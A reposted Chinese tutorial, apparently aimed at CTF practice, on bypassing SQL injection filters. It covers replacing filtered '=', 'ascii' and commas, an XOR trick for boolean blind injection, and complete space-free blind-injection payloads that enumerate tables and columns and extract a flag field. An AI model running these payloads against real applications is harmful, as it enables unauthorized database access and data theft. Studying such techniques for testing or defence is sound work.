微学网

热门关键词:   as  thinkphp  ecshop  xxx  商务通  www.ymwears.cn
热门: ASP.NET PHP编程 ASP编程 JSP编程 Python

SQL注入的 过滤 思路 payload 万能密码

发布时间:2021-04-29 来源:未知 点击:

目录:

  • 一、过滤关键词:
      • 1. 过滤 `=` 可用 `like`,`regexp`,`in`来代替:
      • 2. 过滤`ascii`,不能用bool盲注了。可用`ord`来代替:
      • 3. `,`逗号被过滤了:
        • 1. `substr(***,1,1)` 用这个来代替:`substr(***from({})for(1))`
        • 2.`limit 0,1` 用这个来代替:`limit 1 offset {}`
  • 二、一些小trick
      • 1. 关于bool盲注的正确与否
  • 三、一些payload:
    • 1. 过滤了 空格,但是可以联合查询的bool注入:
  • 四 、 万能密码:

还在补充中:…

一、过滤关键词:

1. 过滤 = 可用 like,regexp,in来代替:

=被过滤了,可以用 like来代替。
如果=like 被过滤了,也可以用regexp或者 in 来代替,后面都有,
注意:尽量不要用regepx来做,后面有解释,用 in like是可以的。这个 和 = 的效果是一样的。regexp是正则,如果ord是100的化,你regexp(1)也会是成功的。。。当然除非我们使用regexp的正则规定,算了没找到,就不要用regexp了吧。

在这里插入图片描述

能用

在这里插入图片描述

尽量不要用regep

在这里插入图片描述

2. 过滤ascii,不能用bool盲注了。可用ord来代替:

在这里插入图片描述

3. ,逗号被过滤了:

1. substr(***,1,1) 用这个来代替:substr(***from({})for(1))

  • substr(***,1,1),用 substr(***from({})for(1))。来代替。
    from是从1开始的。for总是1
    在这里插入图片描述

2.limit 0,1 用这个来代替:limit 1 offset {}

这个测试过滤,不能够用括号来代替空格。。。
在这里插入图片描述

二、一些小trick

1. 关于bool盲注的正确与否

如果1^0这样的,错误的时候有回显,正确的时候没有回显,那么我们完全可以再加一个抑或啊,像这样:1^0^1。这样,就能够达到我们一一对应的目的了

三、一些payload:

1. 过滤了 空格,但是可以联合查询的bool注入:

这个稍微有点鸡肋,不过还好,用了 group_concat因为这样 以来select就不用 limit 这样了,就不需要使用 空格了。
关于ordin regex什么的可以看上面
查找库名的:
1^(ord(substr((select(group_concat(table_name))from(information_schema.tables) where(table_schema)in(database()))from({})for(1)))>{})^1

这个放到 pad++中好好看看括号什么的。
?id=1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)in(database()))from(1)for(1)))>(1))^1
查找 表名的
1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)in(database()))from({})for(1)))in({}))^1
爆列明: 这个过滤了单引号 ,,用16进制绕过,为 falg字段的16进制。
1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)in(0x666c6167))from({})for(1)))in({}))^1

爆flag:
1^(ord(substr((select(group_concat(flag))from(web1.flag))from({})for(1)))in({}))^1

 


这就是微学网-程序员之家为你提供的"SQL注入的 过滤 思路 payload 万能密码"希望对你有所帮助.本文来自网络,转载请注明出处:http://www.weixuecn.cn/article/14338.html
网络编程 | 前端制作 | 数据库 | CMS教程 | 脚本编程 | 框架 | 服务器 | 微信开发 | APP开发 | 学习教程 |

凡本网站转载的文章、图片等资料的版权归版权所有人所有,因无法和版权所有者一一联系,如果本网站选取的文/图威胁到您的权益,请您及时和本网站联系。 我们会在第一时间内采取措施,避免给双方造 成不必要的损失。
© 2015-2021 微学网 版权所有,并保留所有权利。 备案号:粤ICP备09051474号-1

菜鸟学习网,提供各类程序编程入门,技巧